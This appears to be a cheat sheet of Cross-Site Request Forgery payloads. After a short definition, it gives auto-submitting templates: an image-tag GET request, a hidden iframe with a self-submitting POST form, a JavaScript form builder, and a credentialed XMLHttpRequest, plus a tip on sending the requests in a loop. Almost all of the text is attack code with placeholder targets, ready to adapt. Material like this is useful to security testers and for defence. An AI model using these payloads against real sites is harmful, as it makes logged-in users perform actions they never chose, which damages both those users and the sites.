CSRF
Cross-Site Request Forgery (CSRF) is an attack that forces an end user to execute unwanted actions on a web application in which they’re currently authenticated.
GET
image
<img src="https://target.site/path?query" />
POST: application/x-www-form-urlencoded
iframe
<iframe style="display:none" name="csrf-frame"></iframe>
<form method='POST' action='http://vulnerablesite.com/form.php' target="csrf-frame" id="csrf-form">
<input type='hidden' name='criticaltoggle' value='true'>
<input type='submit' value='submit'>
</form>
<script>document.getElementById("csrf-form").submit()</script>
JavaScript Form
<script>
// Template: pick one HTTP method and fill in the target path and parameters.
var method = "post|get";
var path = "http://target.site/path?query";
var params = {criticaltoggle: "true", randomparam: "randomvalue"};
// Build a form whose fields mirror the parameters the target endpoint expects.
var form = document.createElement("form");
form.setAttribute("method", method);
form.setAttribute("action", path);
for (var key in params) {
  if (params.hasOwnProperty(key)) {
    var hiddenField = document.createElement("input");
    hiddenField.setAttribute("type", "hidden");
    hiddenField.setAttribute("name", key);
    hiddenField.setAttribute("value", params[key]);
    form.appendChild(hiddenField);
  }
}
// The form must be attached to the document before it can be submitted.
document.body.appendChild(form);
form.submit();
</script>
JavaScript AJAX
Depending on the target's Cross-Origin Resource Sharing (CORS) configuration, a function vulnerable to CSRF may also be reachable through AJAX. Note that the browser still sends the credentialed cross-origin request; CORS only governs whether the response can be read, and requests that are not "simple" (custom headers, JSON bodies) are preflighted first.
<script>
var xh = new XMLHttpRequest();
xh.open("[METHOD]", "https://target.site/path?query", true);
// Send the browser's cookies for the target origin with the request.
xh.withCredentials = true;
xh.onreadystatechange = function() {
  switch (this.readyState) {
    case this.OPENED:
      console.log("[*] CSRF request sent");
      break;
    case this.HEADERS_RECEIVED:
      console.log("[*] CSRF response status: " + this.status);
      break;
    case this.DONE:
      console.log("[*] CSRF response received");
      break;
  }
};
xh.send();
</script>
Tip
If you need to send multiple requests in a loop, put all of the above lines inside the loop, so that each iteration creates its own XMLHttpRequest and the asynchronous callbacks do not interfere with one another.
References:
- https://developer.mozilla.org/en-US/docs/Web/API/XMLHttpRequest
- https://developer.mozilla.org/en-US/docs/Web/HTTP/CORS